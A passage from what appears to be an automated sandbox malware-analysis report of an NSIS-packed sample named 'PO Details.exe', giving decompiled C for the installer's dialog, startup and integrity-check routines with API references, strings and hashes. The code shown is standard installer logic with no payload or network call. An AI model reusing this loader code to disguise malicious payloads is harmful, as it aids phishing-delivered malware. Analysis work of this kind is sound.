				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x42d250 = _t37;
					if(_t118 == 0x110) {
						 *0x434f08 = _t128;
						 *0x42d264 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t94;
						E00404367(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x434f40;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E004043B3(0x40b);
						while(1) {
							_t39 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x434f44;
							if(_t41 ==  *0x434f44) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040644E(_t119, _t128, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404367(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404367(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404367(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x434fac - _t136;
							_v32 = _t51;
							if( *0x434fac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404389(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x42b230, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x434fac - _t136;
							if( *0x434fac == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E0040439C();
							E00406411(0x42d268, E00403E6F());
							E0040644E(0x42d268, _t128, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x42d268); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "&E@"), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x433ed8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404367(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004043B3(0x405);
									goto L58;
								}
								__eflags =  *0x434fac - _t136;
								if( *0x434fac != _t136) {
									goto L61;
								}
								__eflags =  *0x434fa0 - _t136;
								if( *0x434fa0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t128,  *0x42ba38);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x42d248, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004043CE(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x433ed8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x434fac - _t136;
										if( *0x434fac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x42ba38 = 1;
											L21:
											_push(0x78);
											L22:
											E00404340();
											goto L26;
										}
										E0040140B(_t130);
										 *0x42ba38 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _a12;
						L58:
						if( *0x42f268 == _t136) {
							_t145 =  *0x433ed8 - _t136; // 0x1038c
							if(_t145 != 0) {
								ShowWindow(_t128, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403e97
0x00403ea0
0x00403fe1
0x00403fe5
0x00403fe9
0x00403feb
0x00403ff0
0x00403ffb
0x00404006
0x0040400b
0x0040400d
0x0040400f
0x00404012
0x00404017
0x00404025
0x00404032
0x00404039
0x00404039
0x0040403a
0x0040403a
0x0040403f
0x00404045
0x0040404c
0x00404052
0x00404054
0x00404094
0x00404099
0x0040409e
0x0040409e
0x004040a3
0x004040ac
0x004040ae
0x004040b3
0x004040b9
0x004040bd
0x004040bd
0x004040c2
0x004040c8
0x00000000
0x00000000
0x004040d3
0x004040d9
0x00000000
0x00000000
0x004040e2
0x004040ea
0x004040ef
0x004040f2
0x004040f8
0x004040fd
0x00404100
0x00404106
0x0040410b
0x0040410e
0x00404114
0x0040411c
0x00404122
0x00404128
0x0040412c
0x00404133
0x00404133
0x00404133
0x0040413d
0x0040414f
0x0040415b
0x00404160
0x0040416a
0x00404170
0x00404172
0x00404177
0x00404174
0x00404174
0x00404174
0x00404187
0x0040419f
0x004041a1
0x004041a7
0x004041bc
0x004041a9
0x004041b2
0x004041b4
0x004041b4
0x004041c2
0x004041d3
0x004041e9
0x004041f0
0x004041f6
0x004041fa
0x004041ff
0x00404201
0x00000000
0x00404207
0x00404207
0x00404209
0x00000000
0x00000000
0x0040420f
0x00404213
0x00404238
0x0040423e
0x00404244
0x00404246
0x00000000
0x00000000
0x0040426c
0x00404272
0x00404274
0x00404279
0x00000000
0x00000000
0x0040427f
0x00404282
0x00404285
0x0040429c
0x004042a8
0x004042c1
0x004042c7
0x004042cb
0x004042d0
0x004042d6
0x00000000
0x00000000
0x004042e0
0x004042eb
0x00000000
0x004042eb
0x00404215
0x0040421b
0x00000000
0x00000000
0x00404221
0x00404227
0x00000000
0x00000000
0x00000000
0x0040422d
0x00404201
0x004042f8
0x00404304
0x0040430b
0x00000000
0x00404056
0x00404056
0x00404059
0x0040408c
0x0040408c
0x0040408e
0x00000000
0x00000000
0x00000000
0x0040408e
0x0040405b
0x0040405f
0x00404064
0x00404066
0x00000000
0x00000000
0x00404076
0x0040407e
0x00000000
0x00404084
0x00403eb2
0x00403eb2
0x00403eb6
0x00403ebb
0x00403eca
0x00403eca
0x00403ed3
0x00403edc
0x00403ee7
0x00403ee7
0x00403ef3
0x00403f0f
0x00403f12
0x00403f25
0x00403f2b
0x00403fce
0x00000000
0x00403fd7
0x00403f31
0x00403f3e
0x00403f40
0x00403f42
0x00403f61
0x00403f61
0x00403f64
0x00403f69
0x00403f6c
0x00403f7c
0x00403f7d
0x00403f7f
0x00403fb5
0x00403fc8
0x00000000
0x00403fc8
0x00403f81
0x00403f87
0x00403fa0
0x00403fa5
0x00403fa7
0x00000000
0x00000000
0x00403fa9
0x00403f95
0x00403f95
0x00403f97
0x00403f97
0x00000000
0x00403f97
0x00403f8a
0x00403f8f
0x00000000
0x00403f8f
0x00403f6e
0x00403f74
0x00000000
0x00000000
0x00403f76
0x00000000
0x00403f76
0x00403f66
0x00000000
0x00403f66
0x00403f4c
0x00403f53
0x00403f59
0x00403f5b
0x00000000
0x00000000
0x00000000
0x00403f5b
0x00403f17
0x00000000
0x00403ef5
0x00403efb
0x00403f05
0x00404311
0x00404317
0x00404319
0x0040431f
0x00404324
0x0040432a
0x0040432a
0x0040431f
0x00404334
0x00000000
0x00404334
0x00403ef3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403ECA
ShowWindow.USER32(?), ref: 00403EE7
DestroyWindow.USER32 ref: 00403EFB
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F17
GetDlgItem.USER32(?,?), ref: 00403F38
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F4C
IsWindowEnabled.USER32(00000000), ref: 00403F53
GetDlgItem.USER32(?,00000001), ref: 00404001
GetDlgItem.USER32(?,00000002), ref: 0040400B
SetClassLongW.USER32(?,000000F2,?), ref: 00404025
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404076
GetDlgItem.USER32(?,00000003), ref: 0040411C
ShowWindow.USER32(00000000,?), ref: 0040413D
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040414F
EnableWindow.USER32(?,?), ref: 0040416A
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404180
EnableMenuItem.USER32(00000000), ref: 00404187
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040419F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041B2
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 004041DC
SetWindowTextW.USER32(?,0042D268), ref: 004041F0
ShowWindow.USER32(?,0000000A), ref: 00404324

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
Instruction ID: cb6f0490afd218b95da4ce8f8645ed9f2a2dc6dad26b5163c80864a666f03042
Opcode Fuzzy Hash: 9f4b89b181f7ea2427412b6a5e1e41d5f9313a160c091d4bdffc9bb879b1fb5a
Instruction Fuzzy Hash: 40C1AFB1600305EFDB206F61EE85E2B7A68FB85706B54053EFA81B11F0CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403AE0 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403AE0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f14;
				_t22 = E00406806(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E004062DF(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E004062DF(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406358(L"1033", _t73 & 0x0000ffff);
				}
				E00403DB6(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption";
				 *0x434fa0 =  *0x434f1c & 0x00000020;
				 *0x434fbc = 0x10000;
				if(E00405DEE(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption") != 0) {
					L16:
					if(E00405DEE(_t98, _t86) == 0) {
						E0040644E(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403DB6(_t78, __eflags);
							__eflags =  *0x434fc0;
							if( *0x434fc0 != 0) {
								_t33 = E0040554C(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E00406796("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E00406796("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403E8E, 0); // executed
							E00403A30(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E004062DF(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f58 + _t78 * 2,  *0x434f58 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405D13(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406411(_t86, E00405CE6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405D32(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403ae6
0x00403aef
0x00403af6
0x00403af8
0x00403b0c
0x00403b1e
0x00403b27
0x00403b30
0x00403b37
0x00403b3c
0x00403b43
0x00403b56
0x00403b56
0x00403b61
0x00403afa
0x00403afa
0x00403b05
0x00403b05
0x00403b66
0x00403b70
0x00403b79
0x00403b7e
0x00403b8f
0x00403c21
0x00403c29
0x00403c32
0x00403c32
0x00403c48
0x00403c4e
0x00403c5c
0x00403cdd
0x00403ce5
0x00403cef
0x00403cf4
0x00403cfa
0x00403d84
0x00403d89
0x00403d8b
0x00403da7
0x00000000
0x00403da7
0x00403d8d
0x00403d93
0x00403d9b
0x00403d9b
0x00000000
0x00403d93
0x00403d08
0x00403d13
0x00403d18
0x00403d1a
0x00403d21
0x00403d21
0x00403d2c
0x00403d34
0x00403d36
0x00403d38
0x00403d41
0x00403d44
0x00403d4a
0x00403d4a
0x00403d50
0x00403d69
0x00403d7a
0x00000000
0x00403d7f
0x00403ce7
0x00403ce9
0x00000000
0x00403c5e
0x00403c5e
0x00403c6a
0x00403c74
0x00403c7a
0x00403c7f
0x00403c8e
0x00403dac
0x00403dac
0x00000000
0x00403dac
0x00403c9d
0x00403cd8
0x00000000
0x00403cd8
0x00403b95
0x00403b95
0x00403b98
0x00403b9a
0x00000000
0x00000000
0x00403ba8
0x00403bba
0x00403bbf
0x00403bc8
0x00000000
0x00000000
0x00403bce
0x00403bd0
0x00403bdd
0x00403bdd
0x00403be6
0x00403bec
0x00403c14
0x00403c1c
0x00000000
0x00403bfe
0x00403bff
0x00403c08
0x00403c0e
0x00403c0f
0x00000000
0x00403c0f
0x00403c0a
0x00403c0c
0x00000000
0x00000000
0x00000000
0x00403c0c
0x00403bec

APIs

Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833

GetUserDefaultUILanguage.KERNELBASE(00000002,76693420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO Details.exe" ,00000000), ref: 00403AFA

Part of subcall function 00406358: wsprintfW.USER32 ref: 00406365

lstrcatW.KERNEL32(1033,0042D268), ref: 00403B61
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76693420), ref: 00403BE1
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403BF4
GetFileAttributesW.KERNEL32(Call), ref: 00403BFF
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption), ref: 00403C48
RegisterClassW.USER32(00433EA0), ref: 00403C85
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C9D
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CD2
ShowWindow.USER32(00000005,00000000), ref: 00403D08
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403D34
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403D41
RegisterClassW.USER32(00433EA0), ref: 00403D4A
DialogBoxParamW.USER32(?,00000000,00403E8E,00000000), ref: 00403D69

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403B14
_Nb, xrefs: 00403C64, 00403CCC
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption, xrefs: 00403B70, 00403B78, 00403C1B, 00403C21, 00403C31
RichEd32, xrefs: 00403D1C
RichEdit, xrefs: 00403D3B
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 00403AE4
.exe, xrefs: 00403BEE
C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE5
1033, xrefs: 00403B00, 00403B5C
Call, xrefs: 00403BA8, 00403BB1, 00403BBF, 00403C0E, 00403C14
RichEd20, xrefs: 00403D0E
RichEdit20W, xrefs: 00403D2C, 00403D32
.DEFAULT\Control Panel\International, xrefs: 00403B4C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PO Details.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2544985370
Opcode ID: b6d7d8a8cdf8beafbbe2f4ef846f242538d17a79dc411b5244a10106e626ad05
Instruction ID: ef062d508cd4fc62497976b4bc03dd7eae2cd9e8a178e807e7972486bae2ade7
Opcode Fuzzy Hash: b6d7d8a8cdf8beafbbe2f4ef846f242538d17a79dc411b5244a10106e626ad05
Instruction Fuzzy Hash: 9A61B8711447006EE320AF66AE46F2B3A6CEBC5B4AF40453FF941B61E1DB7D9901CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00403015(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\PO Details.exe";
				 *0x434f10 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\PO Details.exe", 0x400);
				_t89 = E00405F07(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406411(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406411(0x444000, E00405D32(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402FB1(1);
					__eflags =  *0x434f18 - _t82;
					if( *0x434f18 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040347D( *0x434f18 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E0040324C(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f14 = _t94;
							 *0x434f1c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f20 =  *0x434f20 + 1;
								__eflags =  *0x434f20;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405EC2(0x434f40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040347D( *0x41ea18);
					_t65 = E00403467( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f18) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403467(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402FB1(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f18;
						if( *0x434f18 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402FB1(0);
							}
							goto L20;
						}
						E00405EC2( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x2b86a
						 *0x434fc0 =  *0x434fc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f18 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
